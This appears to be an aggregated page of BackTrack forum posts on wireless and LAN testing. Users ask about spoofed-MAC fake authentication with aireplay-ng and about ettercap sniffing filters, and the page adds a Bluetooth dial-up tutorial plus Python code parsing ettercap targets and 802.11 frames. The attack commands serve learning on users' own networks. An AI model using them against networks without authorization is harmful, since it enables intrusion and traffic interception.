macchanger -m XX:XX:XX:XX:XX:BB mon0
ifconfig mon0 up;
airodump-ng -c 1 mon0
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==>
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Got a deauthentication packet! (Waiting 3 seconds)
.
.
.
Got a deauthentication packet! (Waiting 5 seconds)
.
.
. etc.
This happens for both Intel 5100 and Alfa AWUS036H
When I attempt an attack on my office router (with permission, namely by me), the MAC spoofing doesn't seem to result in deauthentication from the router.
What can be done:
1) Injection test, aireplay-ng --test mon0, will result in successful injection on both spoofed mac and original mac
2) With original mac, most attacks on d-link are successful as per tutorials on this page and other sources, including attacks 2,3,4, and subsequent aircracks and dictionary/table attacks. Once connected and ARP poisoned, many other attacks also work as usual.
QUESTION:
+How can the router possibly know what my original mac address is? (Again, NO MAC filters on routers)
+Why does it allow fake auth if I use original mac, but denies authentication when I use other macs (both completely random, or pseudo random spoofing like changing the last digit) ?
+Is there a work around?
Thank you for taking time to read my question, I appreciate any questions regarding my setup or comments on how I can approach the problem.
C.
14:24
remote-exploit & backtrack
As the title states, I am trying to find some facts about
WHICH USB Wi-Fi N-draft adapter is known to work with BackTrack installed on VMware Fusion.
The USB N-draft adapters I am looking for are the ones that support
BOTH 2.4 GHz and 5 GHz.
If someone has used a particular USB N-draft Wi-Fi adapter for the above, could you share the brand, model and where you bought it?
Thanks!
4:33
SecDocs
Authors: Fabian Yamaguchi
Tags: exploiting client side
Event: Chaos Communication Congress 26th (26C3) 2009
Abstract: We will be presenting a number of previously undisclosed network-related design errors, ranging from data-link-layer bugs in Ethernet-drivers across issues in TCP/IP stacks all the way up to communication infrastructure components on layer 5. Our focus is on subtle mistakes, which do not fall into the memory-corruption category and yet in combination provide an attacker with a powerful bag of tricks. Built around a fictional average company network, we will tell the story of an attack making use of subtle bugs across the layers all of which are as of yet undisclosed. This will include a bug in an Ethernet-driver, which allows an attacker to bypass MAC- and IP-based filters, bugs in TCP-implementations that are assumed to be fixed but aren't, a web-cache which confuses itself and an instant-messenger, which was fooled by the protocol specification. All of these bugs share a common property: They are a consequence of insecure design and not of insecure coding-practices.
9:18
remote-exploit & backtrack
I read the man pages of ettercap and they say the target can be in the form
MAC/IP/PORTS
Ok...
To all my dear darklords... I have 2 basic questions for which I request some help:
<> If I specify MAC addresses /MAC/ /MAC2/ it says "Invalid IP range". So how do you specify them, or is that not allowed?
<> More important one: I would like to SNIFF NOT ALL BUT JUST PACKETS OF PORTS #80 AND 443 FOR A SPECIFIC IP RANGE.
I thought this would convey the information:
ettercap <options> /IP:port1,port2/ /IP2:Port1,port2/
but it does not like that format either.
Can someone please let me know if that is possible and how.
MANY THANKS
S
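The MAC/IPs/PORTs target syntax the post above asks about, worked through as an added example that is not part of the post or of ettercap itself: a small Python parser and matcher for that spec, following the forms shown in the ettercap man page (an empty part means ANY, so `//` matches everything; IP lists and last-octet ranges such as 192.168.0.1-30,40,50; port lists and ranges such as 20-25,80). The grammar accepted for IP lists (later bare items reuse the first item's a.b.c prefix) is my reading of the man page examples and is an assumption, and the class and function names are mine. A MAC written in the IP slot is rejected with the same "Invalid IP range" wording, and the IP:port form is rejected too.

```python
"""Parser/matcher for ettercap-style TARGET specs of the form MAC/IPs/PORTs.

Added example, not code from the forum post or from ettercap itself.
An empty part means ANY, so "//" matches everything.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional, Set

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


@dataclass
class Target:
    mac: Optional[str]         # None = ANY
    ips: Optional[Set[int]]    # None = ANY, else IPv4 addresses as ints
    ports: Optional[Set[int]]  # None = ANY


def _parse_int_list(spec: str, lo: int, hi: int) -> Set[int]:
    """'20-25,80,443' -> {20,...,25,80,443}; every value must be in [lo, hi]."""
    out: Set[int] = set()
    for item in spec.split(","):
        a, _, b = item.partition("-")
        first, last = int(a), int(b or a)     # int() rejects junk like '5:80'
        if not lo <= first <= last <= hi:
            raise ValueError(f"invalid range: {item}")
        out.update(range(first, last + 1))
    return out


def _parse_ips(spec: str) -> Set[int]:
    """'192.168.0.1-30,40,50' -> 32 addresses.

    Assumption (from the man page example 10.0.0.1-5,33): the first item
    carries the full a.b.c prefix and later bare items reuse it; a range
    may only span the last octet.
    """
    out: Set[int] = set()
    prefix = None
    for item in spec.split(","):
        if item.count(".") == 3:
            prefix, last = item.rsplit(".", 1)
        elif prefix is not None and "." not in item:
            last = item
        else:
            raise ValueError(f"Invalid IP range: {item}")   # e.g. a MAC in the IP slot
        base = int(ipaddress.IPv4Address(prefix + ".0"))
        out.update(base + o for o in _parse_int_list(last, 0, 255))
    return out


def parse_target(spec: str) -> Target:
    """Parse 'MAC/IPs/PORTs'; raises ValueError on anything malformed."""
    parts = spec.split("/")
    if len(parts) != 3:
        raise ValueError("target must be MAC/IPs/PORTs (use // for ANY)")
    mac_s, ip_s, port_s = parts
    mac = None
    if mac_s:
        if not MAC_RE.match(mac_s):
            raise ValueError(f"invalid MAC: {mac_s}")
        mac = mac_s.lower()
    ips = _parse_ips(ip_s) if ip_s else None
    ports = _parse_int_list(port_s, 1, 65535) if port_s else None
    return Target(mac, ips, ports)


def is_valid_target(spec: str) -> bool:
    try:
        parse_target(spec)
        return True
    except ValueError:
        return False


def matches(t: Target, mac: str, ip: str, port: int) -> bool:
    """Would a packet endpoint (mac, ip, port) fall inside the target?"""
    if t.mac is not None and t.mac != mac.lower():
        return False
    if t.ips is not None and int(ipaddress.IPv4Address(ip)) not in t.ips:
        return False
    if t.ports is not None and port not in t.ports:
        return False
    return True


if __name__ == "__main__":
    # Only ports 80 and 443 of hosts 192.168.1.1-30, any MAC:
    t = parse_target("/192.168.1.1-30/80,443")
    print(matches(t, "00:11:22:33:44:55", "192.168.1.7", 443))   # True
    print(matches(t, "00:11:22:33:44:55", "192.168.1.7", 22))    # False
```

Two targets are given on the ettercap command line, one per side of the conversation, so a spec such as `/192.168.1.1-30/80,443` paired with `//` restricts sniffing to web traffic of that range; a MAC-only target is written as `00:11:22:33:44:55//`.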
6:01
remote-exploit & backtrack
How to connect to your phone via Bluetooth to access Internet
by: MWood
This is not 100% foolproof, but it works for me.
My provider is DNA Finland; your chat-script line
may be different according to your service description.
Configure your files:
/etc/bluetooth: edit rfcomm.conf and main.conf
/etc/bluetooth/rfcomm.conf
#
# RFCOMM configuration file.
#
rfcomm0 {
    # Automatically bind the device at startup
    bind yes;

    # Bluetooth address of the device
    device 00:26:CC:8A:24:59;

    # RFCOMM channel for the connection
    channel 1;

    # Description of the connection
    comment "Dial-Up Networking";
}
/etc/bluetooth/main.conf
[General]
# List of plugins that should not be loaded on bluetoothd startup
#DisablePlugins = network,input
# Default adapter name
# %h - substituted for hostname
# %d - substituted for adapter id
#Name = %h-%d
Name = YOUR_BOX
# Default device class. Only the major and minor device class bits are
# considered
#Class = 0x000100
Class = 0x0a010c
# run "hciconfig hci0 class"
# How long to stay in discoverable mode before going back to non-discoverable
# The value is in seconds. Default is 180, i.e. 3 minutes.
# 0 = disable timer, i.e. stay discoverable forever
DiscoverableTimeout = 0
# Use some other page timeout than the controller default one
# (16384 = 10 seconds)
PageTimeout = 8192
# Behaviour for Adapter.SetProperty("mode", "off")
# Possible values: "DevDown", "NoScan" (default)
OffMode = NoScan
# Discover scheduler interval used in Adapter.DiscoverDevices
# The value is in seconds. Default is 0 to use controller scheduler
DiscoverSchedulerInterval = 0
/etc/ppp/peers: create a file "BluetoothDialup"
/etc/ppp/peers/BluetoothDialup
debug
noauth
connect "/usr/sbin/chat -v -f /etc/chatscripts/BluetoothDialup"
usepeerdns
/dev/rfcomm0 115200
defaultroute
crtscts
lcp-echo-failure 0
/etc/chatscripts: create a file "BluetoothDialup" (yes, the same name as above)
/etc/chatscripts/BluetoothDialup
TIMEOUT 35
ECHO ON
ABORT '\nBUSY\r'
ABORT '\nERROR\r'
ABORT '\nNO ANSWER\r'
ABORT '\nNO CARRIER\r'
ABORT '\nNO DIALTONE\r'
ABORT '\nRINGING\r\n\r\nRINGING\r'
'' \rAT
OK 'AT+CGDCONT=1, "IP", "INTERNET"'
OK ATD*99#
CONNECT ""
Note: the line
OK ATD*99#
is your dial-up number; mine is simply *99#.
Note: the line
OK 'AT+CGDCONT=1, "IP", "INTERNET"'
is very important, especially the "INTERNET" entry; this should
match your phone's service. Mine is "dna INTERNET" on my phone, but
the correct info for the script is "INTERNET".
If you get an error about needing to subscribe to blah blah, you got it wrong!
/var/lib/bluetooth/YOUR_BT4_BLUETOOTHDEVICE_MAC/: create a file called "pincodes"
and enter on one line:
YOUR_PHONES_MAC PIN
/var/lib/bluetooth/YOUR_BT4_BLUETOOTHDEVICE_MAC/pincodes
example:
00:11:22:33:44:55 1234
Restart the bt daemon...
user@bt~# /etc/init.d/bluetooth restart
To connect, issue the command...
user@bt~# pon BluetoothDialup
To disconnect, issue the command...
user@bt~# poff BluetoothDialup
Problems:
If you have previously paired your phone in Windows,
you may need to delete the old pairing,
then re-pair in BT4. Pairing will be from BT4 -> phone
(accept the request and PIN: 1234).
2:36
remote-exploit & backtrack
Hi,
I just have a simple question that I could not answer, since I found no information anywhere...
Can an Ettercap filter be used for Layer 2 parameters (MAC addresses)?
I tried to create a filter using the parameters "eth.src" and "eth.dst", and etterfilter compiled it without problems. Anyway, once the filter is applied, it does not filter as desired...
Thanks for the help!
Best regards.
17:47
remote-exploit & backtrack
So I came across a 4-minute video on YouTube on how to penetrate my own router. I have a Belkin router and I was able to do everything the fella in the video did.
I use VMware to run BT4. I type out everything he does, but with my own info obviously. And this is what I see afterwards...
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 676863 packets (got 1 ARP requests and 19928 ACKs), sent 623247 packets...(499 pps)
I know nothing of what I am doing. It just looked easy and I happen to have a USB adapter. But whatever I am doing, I had fun.
thanks
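The "got a deauth/disassoc packet" notice in this post and the "Got a deauthentication packet!" lines in the fake-auth post earlier on this page both come from 802.11 management frames. As an added example, not code from either post or from aircrack-ng, here is a Python decoder for the management-frame header (frame control, the three addresses) and for the bodies of authentication, association-response, deauthentication and disassociation frames, plus a helper that summarises what one AP told one client MAC during an auth/assoc attempt. The sample frames are constructed inline; the addresses and the reason code 6 are made up for the example, and a real capture would come from a monitor-mode pcap with the radiotap header and FCS stripped. Because the three addresses sit in the unencrypted header, the decoder also shows why a client's MAC can be read by anyone in radio range, which bears on the question earlier on this page about whether a network's MAC addresses can be found remotely.

```python
"""Decoder for the 802.11 management frames seen during a fake-auth attempt.

Added example, not code from the forum posts or from aircrack-ng.
Frames are expected without radiotap header and without the trailing FCS.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

# Management subtypes of interest (frame type 0).
SUBTYPES = {0x0: "assoc-req", 0x1: "assoc-resp", 0xa: "disassoc",
            0xb: "auth", 0xc: "deauth"}
# A few IEEE 802.11 reason codes carried by deauth/disassoc bodies.
REASONS = {1: "unspecified", 2: "previous authentication no longer valid",
           3: "sending STA is leaving",
           6: "class 2 frame received from nonauthenticated STA",
           7: "class 3 frame received from nonassociated STA"}


@dataclass
class MgmtFrame:
    subtype: str
    da: str                        # addr1: receiver
    sa: str                        # addr2: transmitter
    bssid: str                     # addr3
    reason: Optional[int] = None   # deauth / disassoc
    status: Optional[int] = None   # auth / assoc-resp (0 = success)


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt(frame: bytes) -> Optional[MgmtFrame]:
    """Return a MgmtFrame for a management frame of interest, else None."""
    if len(frame) < 24:                      # FC(2) Dur(2) A1 A2 A3(18) Seq(2)
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xf
    if ftype != 0 or subtype not in SUBTYPES:
        return None                          # data/control frame or other mgmt
    m = MgmtFrame(SUBTYPES[subtype], _mac(frame[4:10]),
                  _mac(frame[10:16]), _mac(frame[16:22]))
    body = frame[24:]
    if subtype in (0xa, 0xc) and len(body) >= 2:
        m.reason = struct.unpack_from("<H", body, 0)[0]      # reason code
    elif subtype == 0xb and len(body) >= 6:
        m.status = struct.unpack_from("<H", body, 4)[0]      # algo, seq, status
    elif subtype == 0x1 and len(body) >= 4:
        m.status = struct.unpack_from("<H", body, 2)[0]      # capability, status, AID
    return m


def build_mgmt(subtype: int, da: str, sa: str, bssid: str, body: bytes = b"") -> bytes:
    """Constructed management frame (duration and sequence number zeroed)."""
    fc = struct.pack("<H", subtype << 4)     # version 0, type 0 (management)
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (da, sa, bssid))
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + body


def auth_trace(frames: List[bytes], client: str, ap: str) -> List[str]:
    """Summarise what the AP told one client during an auth/assoc attempt."""
    client, ap = client.lower(), ap.lower()
    events = []
    for raw in frames:
        f = parse_mgmt(raw)
        if f is None or {f.da, f.sa} != {client, ap}:
            continue                         # other stations, data frames, junk
        if f.subtype == "auth" and f.sa == ap:
            events.append("auth " + ("ok" if f.status == 0 else f"status {f.status}"))
        elif f.subtype == "assoc-resp" and f.sa == ap:
            events.append("assoc " + ("ok" if f.status == 0 else f"status {f.status}"))
        elif f.subtype in ("deauth", "disassoc"):
            who = "AP" if f.sa == ap else "client"
            events.append(f"{f.subtype} from {who} reason {f.reason} "
                          f"({REASONS.get(f.reason, 'other')})")
    return events


# Constructed sample: open-system auth succeeds, then the AP answers the
# association request with a deauth. Addresses and reason code are made up.
AP = "00:1c:f0:aa:bb:cc"
STA = "00:c0:ca:11:22:bb"
SAMPLE = [
    build_mgmt(0xb, AP, STA, AP, struct.pack("<HHH", 0, 1, 0)),    # auth req, seq 1
    build_mgmt(0xb, STA, AP, AP, struct.pack("<HHH", 0, 2, 0)),    # auth resp, status 0
    build_mgmt(0x0, AP, STA, AP, struct.pack("<HH", 0x0411, 10)),  # assoc req
    build_mgmt(0xc, STA, AP, AP, struct.pack("<H", 6)),            # deauth, reason 6
]

if __name__ == "__main__":
    for line in auth_trace(SAMPLE, STA, AP):
        print(line)
```

Run stand-alone it prints the trace for the constructed exchange ("auth ok", then the deauth with its reason code). With a real capture, feed the raw frames in order and pass the MAC you gave aireplay-ng as the client; frames to or from any other station are ignored, so a trace that comes back empty means nothing was seen for that address.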
4:34
remote-exploit & backtrack
Hello,
I have installed BT4 because I need to use Ettercap for certain integrity tests on a network.
I have tried several filters to alter IP and TCP information and they work great.
I also wanted to alter layer-2 information (MAC addresses, basically).
In the filter I define several conditions depending on the source MAC or destination MAC (eth.src or eth.dst). It lets me compile the filter and run it, but it skips the conditions as it pleases...
Does anyone know what this could be due to?
Thanks!
Hi everyone,
I have been looking throughout the forum and on Google, and have found nothing... that's why I am posting this new thread.
I am using ETTERCAP for testing some security and structural issues of a network.
I configured and compiled some filters for IP and HTTP traffic and they worked with no problems.
The problems came when I tried to do Layer 2 (MAC address) filters. I wrote some filter conditions using
eth.src and
eth.dst, but they did not work. The filter compiled without problems, but the filter did not apply, even if the conditions were fulfilled (I made cross tests with a sniffer and ettercap-filter messages).
Do I have to configure something special to make this filter work?
Thank you everyone for your help!
Hi,
I've looked in the documentation but found nothing...
Is it possible to introduce delays in the sent messages using ettercap bridged sniffing?
Thanks!